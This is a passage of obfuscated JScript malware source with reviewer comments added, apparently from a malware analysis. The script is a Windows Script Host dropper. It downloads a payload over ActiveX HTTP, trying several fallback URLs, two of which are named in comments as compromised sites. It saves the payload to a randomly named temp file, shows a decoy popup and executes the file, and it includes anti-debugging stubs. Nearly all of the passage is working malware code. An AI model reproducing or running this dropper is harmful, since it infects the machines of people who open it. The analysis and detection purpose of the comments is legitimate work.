  254.         indexValue = _0x442eaf;
  255.     }
  256.     return indexValue;
  257. };
  // getDataFromUrl(url, responseHandler): request url through an ActiveX object and report
  // the outcome through the callback.
  //   responseHandler(value, errorFlag) is called with (<decoded property of the object>, false)
  //   when a decoded property of the object equals 0xc8 (200), and with (null, true) when it
  //   does not or when anything in the try block throws.
  // The ProgID and every member name are decoder() lookups, so they are unreadable until the
  // hexArray entries are decoded; the names suggested in the NOTE(review) lines below are
  // inferred from call shape only.
  // NOTE(review): ActiveXObject exists only in Windows Script Host and legacy Internet Explorer
  // hosts, so at run time this request would come from the script host process - relevant when
  // correlating process and network telemetry.
  258. function getDataFromUrl(url, responseHandler) {
  259.     var _0xc3557f = {}; // lookup table of decoded constants and small helper functions
  260.     _0xc3557f[decoder('0x0', '\x62\x4d\x52\x73')] = decoder('0x1', '\x71\x5d\x29\x4c'); // decoded key -> decoded string constant
  261.     _0xc3557f[decoder('0x2', '\x31\x5d\x41\x71')] = decoder('0x3', '\x4c\x64\x6a\x4e'); // decoded key -> decoded string constant
           // Helper: loose equality of its two arguments.
  262.     _0xc3557f[decoder('0x4', '\x78\x6e\x76\x4b')] = function (_0x2a5334, _0x363968) {
  263.         return _0x2a5334 == _0x363968;
  264.     };
           // Helper: calls its first argument with the other two, hiding the direct call.
  265.     _0xc3557f[decoder('0x5', '\x34\x2a\x50\x41')] = function (_0x257d9f, _0x363b24, _0x5e2eaa) {
  266.         return _0x257d9f(_0x363b24, _0x5e2eaa);
  267.     };
  268.     try {
               // NOTE(review): the ProgID comes from the table above - presumably an XMLHTTP-style object; confirm by decoding.
  269.         var xmlHttpObject = new ActiveXObject(_0xc3557f[decoder('0x6', '\x2a\x6d\x78\x6e')]);
               // NOTE(review): three-argument call ending in ![] (false) - looks like open(method, url, async=false), i.e. a synchronous request; confirm.
  270.         xmlHttpObject[decoder('0x7', '\x4a\x5b\x55\x23')](_0xc3557f[decoder('0x8', '\x78\x6e\x76\x4b')], url, ![]);
               // NOTE(review): zero-argument call - presumably send(); confirm.
  271.         xmlHttpObject[decoder('0x9', '\x62\x4d\x52\x73')]();
               // 0xc8 is 200. NOTE(review): the compared property is presumably the HTTP status; confirm.
  272.         if (_0xc3557f[decoder('0xa', '\x71\x5d\x29\x4c')](xmlHttpObject[decoder('0xb', '\x68\x26\x40\x48')], 0xc8)) {
                   // Success: hand a decoded property of the object to the callback with errorFlag = false.
  273.             return _0xc3557f[decoder('0xc', '\x4e\x74\x4d\x5b')](responseHandler, xmlHttpObject[decoder('0xd', '\x26\x47\x21\x63')], ![]);
  274.         } else {
                   // Value other than 200: callback receives (null, true).
  275.             return _0xc3557f[decoder('0xe', '\x35\x54\x37\x4e')](responseHandler, null, !![]);
  276.         }
  277.     } catch (e) {
               // Any exception in the try block is reported the same way as a non-200 result.
  278.         return responseHandler(null, !![]);
  279.     }
  280. }
  281. function getData(writeAndExecute) {
  282.     var _0x2a45ee = {};
  283.     _0x2a45ee[decoder('0xf', '\x4f\x24\x43\x29')] = decoder('0x10', '\x53\x6a\x70\x6f');
  284.     _0x2a45ee[decoder('0x11', '\x54\x78\x76\x49')] = decoder('0x12', '\x5b\x4c\x21\x64');
  285.     _0x2a45ee[decoder('0x13', '\x5b\x4c\x21\x64')] = function (_0x501552, _0x29e47f) {
  286.         return _0x501552 + _0x29e47f;
  287.     };
  288.     _0x2a45ee[decoder('0x14', '\x5b\x46\x39\x4d')] = function (_0x318188) {
  289.         return _0x318188();
  290.     };
  291.     _0x2a45ee[decoder('0x15', '\x24\x70\x43\x53')] = function (_0x3dc7d5, _0x644010, _0x5000ce) {
  292.         return _0x3dc7d5(_0x644010, _0x5000ce);
  293.     };
  294.     _0x2a45ee[decoder('0x16', '\x28\x79\x58\x43')] = decoder('0x17', '\x54\x78\x76\x49');
  295.     _0x2a45ee[decoder('0x18', '\x54\x4f\x67\x7a')] = decoder('0x19', '\x24\x30\x50\x65');
  296.     _0x2a45ee[decoder('0x1a', '\x26\x31\x56\x4b')] = function (_0x3f26a3, _0xf980df, _0x2c74ca) {
  297.         return _0x3f26a3(_0xf980df, _0x2c74ca);
  298.     };
  299.     _0x2a45ee[decoder('0x1b', '\x40\x24\x47\x30')] = decoder('0x1c', '\x26\x47\x21\x63'); //$virXF = "http://608design.com/mainto/6Cgy/"
  300.     _0x2a45ee[decoder('0x1d', '\x31\x5d\x41\x71')] = function (_0x1c04a1, _0x18b233, _0x57dfc4) {
  301.         return _0x1c04a1(_0x18b233, _0x57dfc4);
  302.     };
  303.     _0x2a45ee[decoder('0x1e', '\x35\x54\x37\x4e')] = decoder('0x1f', '\x31\x73\x43\x57'); //$vcJOZ = "https://cssshk.com/wp-admin/gz56/"
  304.     var _0x46fd93 = function () {
  305.         var _0x23499e = !![];
  306.         return function (_0x5a4553, _0x2c9e1c) {
  307.             var _0x4747c8 = _0x23499e ? function () {
  308.                 if (_0x2c9e1c) {
  309.                     var _0x14e2a4 = _0x2c9e1c[decoder('0x20', '\x64\x6f\x74\x73')](_0x5a4553, arguments);
  310.                     _0x2c9e1c = null;
  311.                     return _0x14e2a4;
  312.                 }
  313.             } : function () {
  314.             };
  315.             _0x23499e = ![];
  316.             return _0x4747c8;
  317.         };
  318.     }();
  319.     (function () {
  320.         var _0x35a3dc = {};
  321.         _0x35a3dc[decoder('0x21', '\x24\x65\x70\x67')] = _0x2a45ee.VkgRL;
  322.         _0x35a3dc[decoder('0x22', '\x38\x43\x5a\x49')] = _0x2a45ee.oCwsj;
  323.         _0x35a3dc[decoder('0x23', '\x68\x24\x79\x78')] = function (_0x4c2f0c, _0x2f2cd7) {
  324.             return _0x2a45ee.VSSET(_0x4c2f0c, _0x2f2cd7);
  325.         };
  326.         _0x35a3dc[decoder('0x24', '\x4c\x64\x6a\x4e')] = function (_0x999bb2, _0x46273e) {
  327.             return _0x999bb2(_0x46273e);
  328.         };
  329.         _0x35a3dc[decoder('0x25', '\x4c\x64\x6a\x4e')] = function (_0x1c0ae3) {
  330.             return _0x2a45ee.LjYaf(_0x1c0ae3);
  331.         };
  332.         _0x2a45ee[decoder('0x26', '\x4c\x64\x6a\x4e')](_0x46fd93, this, function () {
  333.             var _0x5101d4 = new RegExp(_0x35a3dc[decoder('0x27', '\x4f\x68\x35\x34')]);
  334.             var _0x2fa48c = new RegExp(decoder('0x28', '\x53\x6a\x70\x6f'), '\x69');
  335.             var _0x3f085c = _0x3e87a6(decoder('0x29', '\x59\x25\x6e\x42'));
  336.             if (!_0x5101d4[decoder('0x2a', '\x54\x78\x76\x49')](_0x3f085c + _0x35a3dc[decoder('0x2b', '\x5b\x4c\x21\x64')]) || !_0x2fa48c[decoder('0x2c', '\x34\x2a\x50\x41')](_0x35a3dc[decoder('0x2d', '\x56\x73\x6b\x54')](_0x3f085c, decoder('0x2e', '\x53\x6a\x70\x6f')))) {
  337.                 _0x35a3dc[decoder('0x2f', '\x4a\x5b\x55\x23')](_0x3f085c, '\x30');
  338.             } else {
  339.                 _0x35a3dc[decoder('0x30', '\x63\x37\x6d\x2a')](_0x3e87a6);
  340.             }
  341.         })();
  342.     }());
  343.     var _0x18f414 = function () {
  344.         var _0x245b55 = !![];
  345.         return function (_0x56080f, _0x18100a) {
  346.             var _0x1e3225 = _0x245b55 ? function () {
  347.                 if (_0x18100a) {
  348.                     var _0x17bd68 = _0x18100a[decoder('0x31', '\x56\x73\x6b\x54')](_0x56080f, arguments);
  349.                     _0x18100a = null;
  350.                     return _0x17bd68;
  351.                 }
  352.             } : function () {
  353.             };
  354.             _0x245b55 = ![];
  355.             return _0x1e3225;
  356.         };
  357.     }();
  358.     var _0x4e9df4 = _0x18f414(this, function () {
  359.         var _0x1053de = _0x2a45ee[decoder('0x32', '\x53\x6a\x70\x6f')][decoder('0x33', '\x68\x26\x40\x48')]('\x7c'), _0x25e780 = 0x0;
  360.         while (!![]) {
  361.             switch (_0x1053de[_0x25e780++]) {
  362.             case '\x30':
  363.                 var _0x31b100 = _0x2a45ee[decoder('0x34', '\x34\x2a\x50\x41')](_0x2c20cd);
  364.                 continue;
  365.             case '\x31':
  366.                 var _0x5a5fcc = {};
  367.                 _0x5a5fcc[decoder('0x35', '\x21\x54\x45\x4b')] = function (_0x3faa15, _0x5620c5) {
  368.                     return _0x3faa15(_0x5620c5);
  369.                 };
  370.                 _0x5a5fcc[decoder('0x36', '\x56\x73\x6b\x54')] = function (_0x15f1a1, _0x5768e7) {
  371.                     return _0x2a45ee.VSSET(_0x15f1a1, _0x5768e7);
  372.                 };
  373.                 continue;
  374.             case '\x32':
  375.                 var _0x2c20cd = function () {
  376.                     var _0x1e0e07;
  377.                     try {
  378.                         _0x1e0e07 = _0x5a5fcc[decoder('0x37', '\x56\x73\x6b\x54')](Function, _0x5a5fcc[decoder('0x38', '\x68\x6e\x50\x49')](_0x5a5fcc[decoder('0x39', '\x54\x78\x76\x49')](decoder('0x3a', '\x21\x54\x45\x4b'), decoder('0x3b', '\x68\x26\x40\x48')), '\x29\x3b'))();
  379.                     } catch (_0xc50881) {
  380.                         _0x1e0e07 = window;
  381.                     }
  382.                     return _0x1e0e07;
  383.                 };
  384.                 continue;
  385.             case '\x33':
  386.                 if (!_0x31b100[decoder('0x3c', '\x68\x6e\x50\x49')]) {
  387.                     _0x31b100[decoder('0x3d', '\x53\x6a\x70\x6f')] = function (_0x3356a7) {
  388.                         var _0x309bd5 = {};
  389.                         _0x309bd5[decoder('0x3e', '\x56\x73\x6b\x54')] = _0x3356a7;
  390.                         _0x309bd5[decoder('0x3f', '\x71\x5d\x29\x4c')] = _0x3356a7;
  391.                         _0x309bd5[decoder('0x40', '\x26\x66\x41\x26')] = _0x3356a7;
  392.                         _0x309bd5[decoder('0x41', '\x76\x78\x38\x5b')] = _0x3356a7;
  393.                         _0x309bd5[decoder('0x42', '\x76\x78\x38\x5b')] = _0x3356a7;
  394.                         _0x309bd5[decoder('0x43', '\x53\x6a\x70\x6f')] = _0x3356a7;
  395.                         _0x309bd5[decoder('0x44', '\x34\x78\x50\x47')] = _0x3356a7;
  396.                         return _0x309bd5;
  397.                     }(_0x49c512);
  398.                 } else {
  399.                     var _0x1a516f = _0x2a45ee[decoder('0x45', '\x34\x78\x50\x47')][decoder('0x46', '\x68\x6e\x50\x49')]('\x7c'), _0x1fee24 = 0x0;
  400.                     while (!![]) {
  401.                         switch (_0x1a516f[_0x1fee24++]) {
  402.                         case '\x30':
  403.                             _0x31b100[decoder('0x47', '\x26\x47\x21\x63')][decoder('0x48', '\x40\x24\x47\x30')] = _0x49c512;
  404.                             continue;
  405.                         case '\x31':
  406.                             _0x31b100[decoder('0x49', '\x63\x37\x6d\x2a')][decoder('0x4a', '\x28\x79\x58\x43')] = _0x49c512;
  407.                             continue;
  408.                         case '\x32':
  409.                             _0x31b100[decoder('0x3d', '\x53\x6a\x70\x6f')][decoder('0x4b', '\x73\x67\x55\x62')] = _0x49c512;
  410.                             continue;
  411.                         case '\x33':
  412.                             _0x31b100[decoder('0x4c', '\x68\x26\x40\x48')][decoder('0x4d', '\x59\x25\x6e\x42')] = _0x49c512;
  413.                             continue;
  414.                         case '\x34':
  415.                             _0x31b100[decoder('0x3c', '\x68\x6e\x50\x49')][decoder('0x4e', '\x62\x4d\x52\x73')] = _0x49c512;
  416.                             continue;
  417.                         case '\x35':
  418.                             _0x31b100[decoder('0x4f', '\x6a\x29\x21\x34')][decoder('0x50', '\x5b\x46\x39\x4d')] = _0x49c512;
  419.                             continue;
  420.                         case '\x36':
  421.                             _0x31b100[decoder('0x51', '\x76\x4c\x28\x5a')][decoder('0x52', '\x31\x5d\x41\x71')] = _0x49c512;
  422.                             continue;
  423.                         }
  424.                         break;
  425.                     }
  426.                 }
  427.                 continue;
  428.             case '\x34':
  429.                 var _0x49c512 = function () {
  430.                 };
  431.                 continue;
  432.             }
  433.             break;
  434.         }
  435.     });
  436.     _0x4e9df4();
  437.     try {
  438.         _0x2a45ee[decoder('0x53', '\x4e\x74\x4d\x5b')](getDataFromUrl, _0x2a45ee[decoder('0x54', '\x53\x6a\x70\x6f')], function (httpResponseBody, errorFlag) {
  439.             var _0x185f68 = {};
  440.             _0x185f68[decoder('0x55', '\x54\x6a\x6a\x34')] = function (_0x2a35f6, _0x3b43bf, _0x4266ed) {
  441.                 return _0x2a45ee.ebaVd(_0x2a35f6, _0x3b43bf, _0x4266ed);
  442.             };
  443.             _0x185f68[decoder('0x56', '\x5b\x46\x39\x4d')] = function (_0x4c990d, _0x39d7ab, _0x225650) {
  444.                 return _0x4c990d(_0x39d7ab, _0x225650);
  445.             };
  446.             _0x185f68[decoder('0x57', '\x34\x78\x50\x47')] = function (_0xef025d, _0x23bfc7, _0x3542ef) {
  447.                 return _0x2a45ee.sPKub(_0xef025d, _0x23bfc7, _0x3542ef);
  448.             };
  449.             _0x185f68[decoder('0x58', '\x4e\x74\x4d\x5b')] = _0x2a45ee.virXF;
  450.             if (!errorFlag) {
  451.                 return _0x2a45ee[decoder('0x59', '\x5b\x46\x39\x4d')](writeAndExecute, httpResponseBody, ![]);
  452.             } else {
  453.                 getDataFromUrl(decoder('0x5a', '\x26\x31\x56\x4b'), function (httpResponseBody, errorFlag) {
  454.                     if (!errorFlag) {
  455.                         return _0x185f68[decoder('0x5b', '\x24\x70\x43\x53')](writeAndExecute, httpResponseBody, ![]);
  456.                     } else {
  457.                         getDataFromUrl(_0x185f68[decoder('0x5c', '\x35\x54\x37\x4e')], function (httpResponseBody, errorFlag) {
  458.                             var _0x3a4f74 = {};
  459.                             _0x3a4f74[decoder('0x5d', '\x31\x73\x43\x57')] = function (_0x9b93a3, _0x520330, _0xd2c4ef) {
  460.                                 return _0x9b93a3(_0x520330, _0xd2c4ef);
  461.                             };
  462.                             _0x3a4f74[decoder('0x5e', '\x38\x43\x5a\x49')] = function (_0x54d8c7, _0x31b21a, _0x1f5b63) {
  463.                                 return _0x185f68.FpLFt(_0x54d8c7, _0x31b21a, _0x1f5b63);
  464.                             };
  465.                             if (!errorFlag) {
  466.                                 return _0x185f68[decoder('0x5f', '\x68\x24\x79\x78')](writeAndExecute, httpResponseBody, ![]);
  467.                             } else {
  468.                                 _0x185f68[decoder('0x60', '\x34\x78\x50\x47')](getDataFromUrl, decoder('0x61', '\x28\x79\x58\x43'), function (httpResponseBody, errorFlag) {
  469.                                     var _0x11ea16 = {};
  470.                                     _0x11ea16[decoder('0x62', '\x34\x78\x50\x47')] = function (_0x417728, _0x556bab, _0x1d9296) {
  471.                                         return _0x417728(_0x556bab, _0x1d9296);
  472.                                     };
  473.                                     if (!errorFlag) {
  474.                                         return _0x3a4f74[decoder('0x63', '\x45\x6f\x6a\x76')](writeAndExecute, httpResponseBody, ![]);
  475.                                     } else {
  476.                                         _0x3a4f74[decoder('0x64', '\x62\x4d\x52\x73')](getDataFromUrl, decoder('0x65', '\x5b\x4c\x21\x64'), function (httpResponseBody, errorFlag) {
  477.                                             if (!errorFlag) {
  478.                                                 return _0x11ea16[decoder('0x66', '\x4f\x68\x35\x34')](writeAndExecute, httpResponseBody, ![]);
  479.                                             } else {
  480.                                                 return _0x11ea16[decoder('0x67', '\x5b\x4c\x21\x64')](writeAndExecute, null, !![]);
  481.                                             }
  482.                                         });
  483.                                     }
  484.                                 });
  485.                             }
  486.                         });
  487.                     }
  488.                 });
  489.             }
  490.         });
  491.     } catch (e) {
  492.         return _0x2a45ee[decoder('0x68', '\x68\x24\x79\x78')](writeAndExecute, null, !![]);
  493.     }
  494. }
  495. function getTempFilePath() {
           // Builds a randomly named file path and returns it; returns false (`![]`) if anything in the try block throws.
           // Every string literal is hidden behind decoder(), and the readable names (FSO, randomFileName, FQFP)
           // are the analyst's renames, so the object and method identities noted below are inferred.
           // TODO confirm each one by resolving the decoder() calls in an isolated analysis environment.
           // Indirection table: one decoded string and two identical "a + b" helpers.
  496.     var _0x3bd4c9 = {};
  497.     _0x3bd4c9[decoder('0x69', '\x26\x47\x21\x63')] = decoder('0x6a', '\x45\x6f\x6a\x76');
  498.     _0x3bd4c9[decoder('0x6b', '\x6a\x29\x21\x34')] = function (_0x53e86b, _0x2c5ad8) {
  499.         return _0x53e86b + _0x2c5ad8;
  500.     };
  501.     _0x3bd4c9[decoder('0x6c', '\x5b\x4c\x21\x64')] = function (_0x351e95, _0x526a24) {
  502.         return _0x351e95 + _0x526a24;
  503.     };
  504.     try {
               // Presumably Scripting.FileSystemObject, going by the FSO rename; the ProgID is a decoded string (TODO confirm).
  505.         var FSO = new ActiveXObject(_0x3bd4c9[decoder('0x6d', '\x2a\x6d\x78\x6e')]);
               // '\x5c' is a backslash. The Math chain is called with 0x24 (36) and then (0x2, 0x9), which looks like
               // Math.random().toString(36) cut down to a short token; the last decoder() value is presumably the
               // file extension (TODO confirm).
  506.         var randomFileName = _0x3bd4c9[decoder('0x6e', '\x4c\x64\x6a\x4e')](_0x3bd4c9[decoder('0x6f', '\x71\x35\x67\x76')]('\x5c', Math[decoder('0x70', '\x6f\x70\x4e\x53')]()[decoder('0x71', '\x54\x78\x76\x49')](0x24)[decoder('0x72', '\x62\x4d\x52\x73')](0x2, 0x9)), decoder('0x73', '\x71\x5d\x29\x4c'));
               // If the decoded method is FileSystemObject.GetSpecialFolder, argument 0x2 selects the temporary folder (TODO confirm).
  507.         var FQFP = FSO[decoder('0x74', '\x26\x31\x56\x4b')](0x2) + randomFileName;
  508.         return FQFP;
  509.     } catch (e) {
               // The exception is discarded; the caller only sees false.
  510.         return ![];
  511.     }
  512. }
  513. function saveToTemp(_0x5f4192, runExe) {
           // Writes the payload `_0x5f4192` to the path returned by getTempFilePath() and reports the result through runExe.
           // runExe is called as (tempPath, false) on success and as (null, true) when no path is available or an exception is thrown.
           // Control flow is flattened: the switch cases run in the order listed in a decoded string, so the case
           // labels below are NOT the execution order. That order string is not readable from this listing.
           // NOTE(review): for detection, the observable effect is a script host writing a new, randomly named file
           // (presumably under the temp folder) shortly before the caller launches it.
           // Indirection table: a zero-argument call thunk, one decoded string (presumably the ProgID read in case '3'),
           // and two identical two-argument call thunks.
  514.     var _0x338c92 = {};
  515.     _0x338c92[decoder('0x75', '\x6a\x29\x21\x34')] = function (_0x5a3de4) {
  516.         return _0x5a3de4();
  517.     };
  518.     _0x338c92[decoder('0x76', '\x24\x30\x50\x65')] = decoder('0x77', '\x26\x47\x21\x63');
  519.     _0x338c92[decoder('0x78', '\x24\x65\x70\x67')] = function (_0x107b3b, _0x37b2f5, _0x287715) {
  520.         return _0x107b3b(_0x37b2f5, _0x287715);
  521.     };
  522.     _0x338c92[decoder('0x79', '\x4e\x2a\x6d\x32')] = function (_0x4610db, _0x1e7d38, _0x38f352) {
  523.         return _0x4610db(_0x1e7d38, _0x38f352);
  524.     };
  525.     try {
               // Equivalent to getTempFilePath(), routed through the call thunk; a false result takes the else branch.
  526.         var tempPath = _0x338c92[decoder('0x7a', '\x26\x47\x21\x63')](getTempFilePath);
  527.         if (tempPath) {
                   // '\x7c' is '|'; the decoded method is presumably split, giving the list of case labels to run in order.
  528.             var _0x4719d2 = decoder('0x7b', '\x26\x66\x41\x26')[decoder('0x7c', '\x59\x25\x6e\x42')]('\x7c'), _0x427fda = 0x0;
  529.             while (!![]) {
  530.                 switch (_0x4719d2[_0x427fda++]) {
  531.                 case '\x30':
                           // Passes the payload to the object; presumably a write call (TODO confirm).
  532.                     newFileObject[decoder('0x7d', '\x62\x4d\x52\x73')](_0x5f4192);
  533.                     continue;
  534.                 case '\x31':
                           // Zero-argument method; with case '2', presumably the open/close pair (TODO confirm which is which).
  535.                     newFileObject[decoder('0x7e', '\x4a\x5b\x55\x23')]();
  536.                     continue;
  537.                 case '\x32':
  538.                     newFileObject[decoder('0x7f', '\x73\x67\x55\x62')]();
  539.                     continue;
  540.                 case '\x33':
                           // `var` is function-scoped, so this declaration is what the other cases refer to.
                           // The property/method shape used on it resembles ADODB.Stream; the ProgID is decoded (TODO confirm).
  541.                     var newFileObject = new ActiveXObject(_0x338c92[decoder('0x80', '\x63\x37\x6d\x2a')]);
  542.                     continue;
  543.                 case '\x34':
                           // Called with the target path and 0x2; on ADODB.Stream that would be SaveToFile with overwrite (TODO confirm).
  544.                     newFileObject[decoder('0x81', '\x62\x4d\x52\x73')](tempPath, 0x2);
  545.                     continue;
  546.                 case '\x35':
                           // Property set to 1; on ADODB.Stream, Type = 1 means binary (TODO confirm the property name).
  547.                     newFileObject[decoder('0x82', '\x4f\x68\x35\x34')] = 0x1;
  548.                     continue;
  549.                 case '\x36':
                           // Property set to 0; presumably the stream position being rewound (TODO confirm).
  550.                     newFileObject[decoder('0x83', '\x59\x25\x6e\x42')] = 0x0;
  551.                     continue;
  552.                 case '\x37':
                           // Success exit: runExe(tempPath, false).
  553.                     return _0x338c92[decoder('0x84', '\x5b\x46\x39\x4d')](runExe, tempPath, ![]);
  554.                 }
                       // Reached only when the label matches no case, i.e. the order list is exhausted.
  555.                 break;
  556.             }
  557.         } else {
                   // No usable path: runExe(null, true).
  558.             return _0x338c92[decoder('0x78', '\x24\x65\x70\x67')](runExe, null, !![]);
  559.         }
  560.     } catch (_0x21246b) {
               // Any exception while creating or writing the file is reported the same way: runExe(null, true).
  561.         return _0x338c92[decoder('0x85', '\x24\x70\x43\x53')](runExe, null, !![]);
  562.     }
  563. }
  564. getData(function (bytes, hasError) {
           // Top-level entry: starts getData and handles its result. `bytes` is the retrieved payload and `hasError`
           // is truthy when retrieval failed (presumably after every fallback in getData has been tried).
           // Two decoded strings are kept in a local table; one is read below as the dialog title and one as the ProgID.
  565.     var _0x414874 = {};
  566.     _0x414874[decoder('0x86', '\x5b\x74\x5e\x54')] = decoder('0x87', '\x24\x70\x43\x53');
  567.     _0x414874[decoder('0x88', '\x5b\x4c\x21\x64')] = decoder('0x89', '\x24\x65\x70\x67');
           // WshShell, Text, Title and Res are assigned without `var`, so they become implicit globals.
           // Presumably WScript.CreateObject("WScript.Shell"); both names are decoded strings (TODO confirm).
  568.     WshShell = WScript[decoder('0x8a', '\x21\x54\x45\x4b')](decoder('0x8b', '\x24\x30\x50\x65'));
  569.     Text = decoder('0x8c', '\x4f\x68\x35\x34');
  570.     Title = _0x414874[decoder('0x8d', '\x6f\x70\x4e\x53')];
           // The argument shape (text, 0, title, 0x0 + 0x40) matches WshShell.Popup; type 0x40 (64) is the information icon.
           // This looks like a decoy message box. It sits before the hasError check, so it is shown whether or not
           // the retrieval succeeded. The message text is a decoded string (TODO confirm by decoding).
  571.     Res = WshShell[decoder('0x8e', '\x33\x44\x43\x70')](Text, 0x0, Title, 0x0 + 0x40);
  572.     if (!hasError) {
  573.         saveToTemp(bytes, function (fileToRun, stopFlag) {
                   // stopFlag is true when saveToTemp could not write the file; nothing is launched in that case.
  574.             if (!stopFlag) {
  575.                 try {
                           // Presumably WScript.Shell and its Run method, given the single path argument (TODO confirm).
                           // NOTE(review): for detection, this is a script host starting a file it has just written to disk.
  576.                     var wsShell = new ActiveXObject(_0x414874[decoder('0x8f', '\x4f\x24\x43\x29')]);
  577.                     wsShell[decoder('0x90', '\x4c\x64\x6a\x4e')](fileToRun);
  578.                 } catch (e) {
                           // Launch failures are silently ignored.
  579.                 }
  580.             }
  581.         });
  582.     }
  583. });
  584. function _0x3e87a6(_0x3927ee) {
           // With a truthy argument, returns the inner function without running it; otherwise runs it starting at 0.
           // The only operations in the body are decoded methods invoked on anonymous function objects, and none of the
           // download/save helpers are called. This resembles the anti-debugging stub that JavaScript obfuscators
           // emit, rather than dropper logic (TODO confirm by resolving the decoder() strings).
           // No call to this function is visible in this part of the listing.
           // Indirection table: decoded strings plus divide, add and single-argument call thunks.
  585.     var _0xa49e00 = {};
  586.     _0xa49e00[decoder('0x91', '\x28\x79\x58\x43')] = decoder('0x92', '\x54\x6a\x6a\x34');
  587.     _0xa49e00[decoder('0x93', '\x35\x54\x37\x4e')] = decoder('0x94', '\x4e\x2a\x6d\x32');
  588.     _0xa49e00[decoder('0x95', '\x21\x54\x45\x4b')] = function (_0x3ff74f, _0x570ecb) {
  589.         return _0x3ff74f / _0x570ecb;
  590.     };
  591.     _0xa49e00[decoder('0x96', '\x71\x5d\x29\x4c')] = decoder('0x97', '\x34\x2a\x50\x41');
  592.     _0xa49e00[decoder('0x98', '\x63\x37\x6d\x2a')] = function (_0x30500c, _0x534308) {
  593.         return _0x30500c + _0x534308;
  594.     };
  595.     _0xa49e00[decoder('0x99', '\x4e\x2a\x6d\x32')] = decoder('0x9a', '\x45\x6f\x6a\x76');
  596.     _0xa49e00[decoder('0x9b', '\x63\x37\x6d\x2a')] = decoder('0x9c', '\x68\x26\x40\x48');
  597.     _0xa49e00[decoder('0x9d', '\x34\x2a\x50\x41')] = function (_0x1aba01, _0x20458e) {
  598.         return _0x1aba01(_0x20458e);
  599.     };
  600.     function _0x3605c7(_0x489ab9) {
               // Type check against a decoded type name; this branch returns immediately and does not recurse.
  601.         if (typeof _0x489ab9 === decoder('0x9e', '\x2a\x6d\x78\x6e')) {
                   // Two chained decoded methods on an empty function, each given a table string. Presumably
                   // .constructor(<source string>) followed by .call/.apply (TODO confirm).
  602.             return function (_0x3a7fa3) {
  603.             }[decoder('0x9f', '\x34\x78\x50\x47')](_0xa49e00[decoder('0xa0', '\x2a\x6d\x78\x6e')])[decoder('0xa1', '\x34\x2a\x50\x41')](_0xa49e00[decoder('0xa2', '\x54\x6a\x6a\x34')]);
  604.         } else {
                   // Presumably ('' + n / n).length !== 1 (true for n = 0, since 0 / 0 is NaN), or n being a multiple of 0x14 (20).
                   // Both branches build a function from concatenated decoded strings and invoke it; the literal
                   // is split across two strings, presumably to hide a keyword such as `debugger` (TODO confirm).
  605.             if (('' + _0xa49e00[decoder('0xa3', '\x28\x79\x58\x43')](_0x489ab9, _0x489ab9))[decoder('0xa4', '\x46\x4d\x5b\x40')] !== 0x1 || _0x489ab9 % 0x14 === 0x0) {
  606.                 (function () {
  607.                     return !![];
  608.                 }[decoder('0xa5', '\x34\x2a\x50\x41')](decoder('0xa6', '\x71\x35\x67\x76') + _0xa49e00[decoder('0xa7', '\x4f\x68\x35\x34')])[decoder('0xa8', '\x21\x54\x45\x4b')](decoder('0xa9', '\x28\x79\x58\x43')));
  609.             } else {
  610.                 (function () {
  611.                     return ![];
  612.                 }[decoder('0xaa', '\x64\x6f\x74\x73')](_0xa49e00[decoder('0xab', '\x4e\x74\x4d\x5b')](_0xa49e00[decoder('0xac', '\x68\x6e\x50\x49')], decoder('0xad', '\x4f\x68\x35\x34')))[decoder('0xae', '\x2a\x6d\x78\x6e')](_0xa49e00[decoder('0xaf', '\x24\x65\x70\x67')]));
  613.             }
  614.         }
               // The numeric path has no base case: it recurses with an incremented counter until something throws.
  615.         _0x3605c7(++_0x489ab9);
  616.     }
  617.     try {
  618.         if (_0x3927ee) {
  619.             return _0x3605c7;
  620.         } else {
                   // Equivalent to _0x3605c7(0), routed through the call thunk.
  621.             _0xa49e00[decoder('0xb0', '\x4a\x5b\x55\x23')](_0x3605c7, 0x0);
  622.         }
  623.     } catch (_0x45f4b4) {
               // Whatever ends the recursion above is swallowed here, so the function then returns undefined.
  624.     }
  625. }